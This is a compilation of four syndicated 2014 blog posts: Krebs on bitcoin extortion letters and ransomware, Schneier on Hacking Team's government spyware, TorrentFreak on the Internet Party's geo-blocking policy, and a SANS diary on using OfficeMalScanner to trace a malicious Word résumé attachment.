Krebs on Security: 2014: The Year Extortion Went Mainstream

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The year 2014 may well go down in the history books as the year that extortion attacks went mainstream. Fueled largely by the emergence of the anonymous online currency Bitcoin, these shakedowns are blurring the lines between online and offline fraud, and giving novice computer users a crash course in modern-day cybercrime.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

At least four businesses recently reported receiving “Notice of Extortion” letters in the U.S. mail. The letters say the recipient has been targeted for extortion, and threaten a range of negative publicity, vandalism and harassment unless the target agrees to pay a “tribute price” of one bitcoin (currently ~USD $561) by a specified date. According to the letter, that tribute price increases to 3 bitcoins (~$1,683) if the demand isn’t paid on time.

The ransom letters, which appear to be custom written for restaurant owners, threaten businesses with negative online reviews, complaints to the Better Business Bureau, harassing telephone calls, telephone denial-of-service attacks, bomb threats, fraudulent delivery orders, vandalism, and even reports of mercury contamination.

The missive encourages recipients to sign up with Coinbase – a popular bitcoin exchange – and to send the funds to a unique bitcoin wallet specified in the letter and embedded in the QR code that is also printed on the letter.

Interestingly, all three letters I could find that were posted online so far targeted pizza stores. At least two of them were mailed from Orlando, Florida.

The letters all say the amounts are due either on Aug. 1 or Aug. 15. Perhaps one reason the deadlines are so far off is that the attackers understand that not everyone has bitcoins, or even knows about the virtual currency.

“What the heck is a BitCoin?” wrote the proprietors of New Hampshire-based 900 Degrees Neapolitan Pizzeria, which posted a copy of the letter (above) on their Facebook page.

Sandra Alhilo, general manager of Pizza Pirates in Pomona, Calif., received the extortion demand on June 16.

“At first, I was laughing because I thought it had to be a joke,” Alhilo said in a phone interview. “It was funny until I went and posted it on our Facebook page, and then people put it on Reddit and the Internet got me all paranoid.”

Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University California, Berkeley, said these extortion attempts cost virtually nothing and promise a handsome payoff for the perpetrators.

“From the fraudster’s perspective, the cost of these attacks is a stamp and an envelope,” Weaver said. “This type of attack could be fairly effective. Some businesses — particularly restaurant establishments — are very concerned about negative publicity and reviews. Bad Yelp reviews, tip-offs to the health inspector..that stuff works and isn’t hard to do.”

While some restaurants may be an easy mark for this sort of crime, Weaver said the extortionists in this case are tangling with a tough adversary — The U.S. Postal Service — which takes extortion crimes perpetrated through the U.S. mail very seriously.

“There is a lot of operational security that these guys might have failed at, because this is interstate commerce, mail fraud, and postal inspector territory, where the gloves come off,” Weaver said. “I’m willing to bet there are several tools available to law enforcement here that these extortionists didn’t consider.”

It’s not entirely clear if or why extortionists seem to be picking on pizza establishments, but it’s probably worth noting that the grand-daddy of all pizza joints – Domino’s Pizza in France — recently found itself the target of a pricey extortion attack earlier this month after hackers threatened to release the stolen details on more than 650,000 customers if the company failed to pay a ransom of approximately $40,000).

Meanwhile, Pizza Pirates’s Alhilo says the company has been working with the local U.S. Postal Inspector’s office, which was very interested in the letter. Alhilo said her establishment won’t be paying the extortionists.

“We have no intention of paying it,” she said. “Honestly, if it hadn’t been a slow day that Monday I might have just throw the letter out because it looked like junk mail. It’s annoying that someone would try to make a few bucks like this on the backs of small businesses.”

A GREAT CRIME FOR CRIMINALS

Fueled largely by the relative anonymity of cryptocurrencies like Bitcoin, extortion attacks are increasingly being incorporated into all manner of cyberattacks today. Today’s thieves are no longer content merely to hijack your computer and bandwidth and steal all of your personal and financial data; increasingly, these crooks are likely to hold all of your important documents for ransom as well.

“In the early days, they’d steal your credit card data and then threaten to disclose it only after they’d already sold it on the underground,” said Alan Paller, director of research at the SANS Institute, a Bethesda, Md. based security training firm. “But today, extortion is the fastest way for the bad guys to make money, because it’s the shortest path from cybercrime to cash. It’s really a great crime for the criminals.

Last month, the U.S. government joined private security companies and international law enforcement partners to dismantle a criminal infrastructure responsible for spreading Cryptlocker, a ransomware scourge that the FBI estimates stole more than $27 million from victims compromised by the file-encrypting malware.

Even as the ink was still drying on the press releases about the Cryptolocker takedown, a new variant of Cryptolocker — Cryptowall — was taking hold. These attacks encrypt the victim PC’s hard drive unless and until the victim pays an arbitrary amount specified by the perpetrators — usually a few hundred dollars worth of bitcoins. Many victims without adequate backups in place (or those whose backups also were encrypted) pay up.  Others, like the police department in the New Hampshire hamlet of Durham, are standing their ground.

The downside to standing your ground is that — unless you have backups of your data — the encrypted information is gone forever. When these attacks hit businesses, the results can be devastating. Code-hosting and project management services provider CodeSpaces.com was forced to shut down this month after a hacker gained access to its Amazon EC2 account and deleted most data, including backups. According to Computerworld, the devastating security breach happened over a span of 12 hours and initially started with a distributed denial-of-service attack followed by an attempt to extort money from the company.

A HIDDEN CRIME

Extortion attacks against companies operating in the technology and online space are nothing new, of course. Just last week, news came to light that mobile phone giant Nokia in 2007 paid millions to extortionists who threatened to reveal an encryption key to Nokia’s Symbian mobile phone source code.

Trouble is, the very nature of these scams makes it difficult to gauge their frequency or success.

“The problem with extortion is that the money is paid in order to keep the attack secret, and so if the attack is successful, there is no knowledge of the attack even having taken place,” SANS’s Paller said.

Traditionally, the hardest part about extortion has been getting paid and getting away with the loot. In the case of the crooks who extorted Nokia, the company paid the money, reportedly leaving the cash in a bag at an amusement park car lot. Police were tracking the drop-off location, but ultimately lost track of the blackmailers.

Anonymous virtual currencies like Bitcoin not only make it easier for extortionists to get paid, but they also make it easier and more lucrative for more American blackmailers to get in on the action. Prior to Bitcoin’s rise in popularity, the principal way that attackers extracted their ransom was by instructing victims to pay by wire transfer or reloadable prepaid debit cards — principally Greendot cards sold at retailers, convenience stores and pharmacies.

But unlike Bitcoin payments, these methods of cashing out are easily traceable if cashed out in within the United States, the ICSI’s Weaver said.

“Bitcoin is their best available tool if in they’re located in the United States,” Weaver said of extortionists. “Western Union can be traced at U.S. cashout locations, as can Greendot payments. Which means you either need an overseas partner [who takes half of the profit for his trouble] or Bitcoin.”

Schneier on Security: More on Hacking Team’s Government Spying Software

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Hacking Team is an Italian malware company that sells exploit tools to governments. Both Kaspersky Lab and Citizen Lab have published detailed reports on its capabilities against Android, iOS, Windows Mobile, and BlackBerry smart phones.

They allow, for example, for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data. They can take screenshots, record audio from the phones to monitor calls or ambient conversations, hijack the phone’s camera to snap pictures or piggyback on the phone’s GPS system to monitor the user’s location. The Android version can also enable the phone’s Wi-Fi function to siphon data from the phone wirelessly instead of using the cell network to transmit it. The latter would incur data charges and raise the phone owner’s suspicion.

[...]

Once on a system, the iPhone module uses advance techniques to avoid draining the phone’s battery, turning on the phone’s microphone, for example, only under certain conditions.

“They can just turn on the mic and record everything going on around the victim, but the battery life is limited, and the victim can notice something is wrong with the iPhone, so they use special triggers,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis team.

One of those triggers might be when the victim’s phone connects to a specific WiFi network, such as a work network, signaling the owner is in an important environment. “I can’t remember having seen such advanced techniques in other mobile malware,” he says.

Hacking Team’s mobile tools also have a “crisis” module that kicks in when they sense the presence of certain detection activities occurring on a device, such as packet sniffing, and then pause the spyware’s activity to avoid detection. There is also a “wipe” function to erase the tool from infected systems.

Hacking Team claims to sell its tools only to ethical governments, but Citizen Lab has found evidence of their use in Saudi Arabia. It can’t be certain the Saudi government is a customer, but there’s good circumstantial evidence. In general, circumstantial evidence is all we have. Citizen Lab has found Hacking Team servers in many countries, but it’s a perfectly reasonable strategy for Country A to locate its servers in Country B.

And remember, this is just one example of government spyware. Assume that the NSA — as well as the governments of China, Russia, and a handful of other countries — have their own systems that are at least as powerful.

TorrentFreak: Dotcom’s Internet Party Wants to Abolish “Geo Blocking” Restrictions

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

internetpartyLast January, exactly two years after the Megaupload raid, Kim Dotcom entered New Zealand’s political arena with the launch of his Internet Party.

The party is currently preparing for the general election in September. While Dotcom will not be on the voting ballot himself, he remains one of the main influencers of the party’s policy.

As the name suggests, many of the party’s core issues revolve around the Internet, copyright included. Today the Internet Party released a draft of its copyright policy with several suggestions for an overhaul of current legislation.

One of the key issues the Internet Party wants to change is the liability New Zealanders face for using VPN services and other circumvention tools to access legal content. At the moment, it is illegal for them to stream content from U.S-based Hulu and Netflix via proxies or VPNs.

TorrentFreak spoke with Kim Dotcom who notes that consumers shouldn’t be punished for the inability of Hollywood to release its content globally. Dotcom hopes that these changes will eventually put a stop to the unnecessary release delays.

“The primary goal of this policy is to force copyright holders to release their content globally, without geographical restrictions. If a TV-show is not available in New Zealand for three months after the U.S. release, there should be no enforcement during this period,” Dotcom tells us.

“Content owners should be held responsible, not the public. The ‘geo blocking’ proposal forces Hollywood to change its business model and release its content worldwide without delays,” he adds.

Dotcom hopes that the Internet Party proposal will serve as model for future copyright law that will eventually be adopted around the world.

Hulu’s Geo Blocking
hului-block

Internet Party leader Laila Harré notes that the current situation is unmanageable. The Internet has made it possible to release content worldwide without any delays, but content owners refuse to give consumers what they want.

“A Kiwi who wants to watch the latest season of first run TV shows like Games of Thrones, for example, shouldn’t be forced to jump through hoops to access what should be legally and easily available online. It’s a ridiculous situation in this day and age,” Harré notes.

Thus far most progress has subsequently been drawn in the opposite direction. In an attempt to crack down on people who bypass geo restrictions, Hulu recently started to ban all visitors who use a VPN connection.

Instead of fighting circumvention, the Internet Party believes that copyright holders should address the root of the problem themselves. Making sure that the latest TV-shows can be watched legally is a must, and although some progress has been made over the years, the legal options are still lacking.

“Some excellent work has been done by some copyright owners and content providers to make good legal options available to New Zealanders. But there’s still a long way to go, especially for some types of content such as globally popular first run television shows broadcast overseas but not available in New Zealand for weeks or months, if at all,” Harré says.

Aside from geo blocking issues, the Internet Party also wants to abolish the Internet disconnection sanction available under New Zealand’s “three-strikes” law, and strengthen the “safe harbor” provisions for Internet services to prevent abuse by copyright holders.

The full draft of the Internet Party’s copyright and open research policy is available here.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: OfficeMalScanner helps identify the source of a compromise, (Sun, Jun 22nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

While working a recent forensics case I had the opportunity to spread the proverbial wings a bit and utilize a few tools I had not prior.
In the midst of building my forensic timeline I set out to determine the initial attack vector, operating on the assumption that it was either web-based content via a malicious ad or a site compromised with a web exploit kit, or was a malicious link or document attachment via email. One interesting variable stood out while reviewing the victim’s PST file. Her company was in the midst of hiring, seeking candidates for a few positions, and was receiving numerous emails with resume attachments, both PDF and DOC/DOCX. I had already discovered the primary malware compromise of the victim’s system so I simply needed to see if there was a malicious email that had arrived prior based on time stamps. One particular email with a Word doc attached stood right out as it arrived at 12:23am on the same day of the malware compromise later at noon. Antimalware detection immediately identified the attachment as TrojanDownloader:W97M/Ledod.A. This alleged resume attachment was also for a John Cena, which cracked me up as I am indeed familiar with the WWE professional wrestler of the same name. Unfortunately, technical details for W97M/Ledod.A were weak at best and all I had to go from initially was “this trojan can download and run other malware or potentially unwanted software onto your PC.” Yeah, thanks for that. What is a poor forensicator to do? Frank Boldewin’s (Reconsructer.org) OfficeMalScanner to the rescue! This tool works like a charm when you want a quick method to scan for shellcode and encrypted PE files as well as pulling macro details from a nasty Office documents. As always, when you choose to interact with mayhem, it’s best to do so in an isolated environment; I run OfficeMalScanner on Windows 7 virtual machine. If you just run OfficeMalScanner with out defining any parameters, it kindly dumps options for you as seen in Figure 1.

OfficeMalScanner options

Figure 1

For this particular sample, when I ran OfficeMalScanner.exe "John Cena Resume.doc" scan the result “No malicious traces found in this file!” was returned. As the tool advised me to do, I ran OfficeMalScanner.exe "John Cena Resume.doc" info as well and struck pay dirt as seen in Figure 2.

OfficeMalScanner finds macros code

Figure 2

When I opened ThisDocument from C:\tools\OfficeMalScanner\JOHN CENA RESUME.DOC-Macros I was treated to the URL and executable payload I was hoping for as seen in Figure 3.

OfficeMalScanner results

Figure 3

A little virustotal.com and urlquery.net research on dodevelopments.com told me everything I needed to know, pure Lithuanian evil in the form of IP address 5.199.165.239.  
A bit of trekking through all the malicious exe’s known to be associated with that IP address and voila, I had my source.

See Jared Greenhill‘s writeup on these same concepts at EMC’s RSA Security Analytics Blog and our own Lenny Zeltser‘s Analyzing Malicious Documents Cheat Sheet where I first learned about OfficeMalScanner. Prior related diaries also include Decoding Common XOR Obfuscation in Malicious Code and Analyzing Malicious RTF Files Using OfficeMalScanner’s RTFScan (Lenny is El Jefe).

I hope to see some of you at SANSFIRE 2014. I’ll be there for the Monday evening State of the Internet Panel Discussion at 7:15 and will present C3CM Defeating the Command, Control, and Communications of Digital Assailants on Tuesday evening at 8:15.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.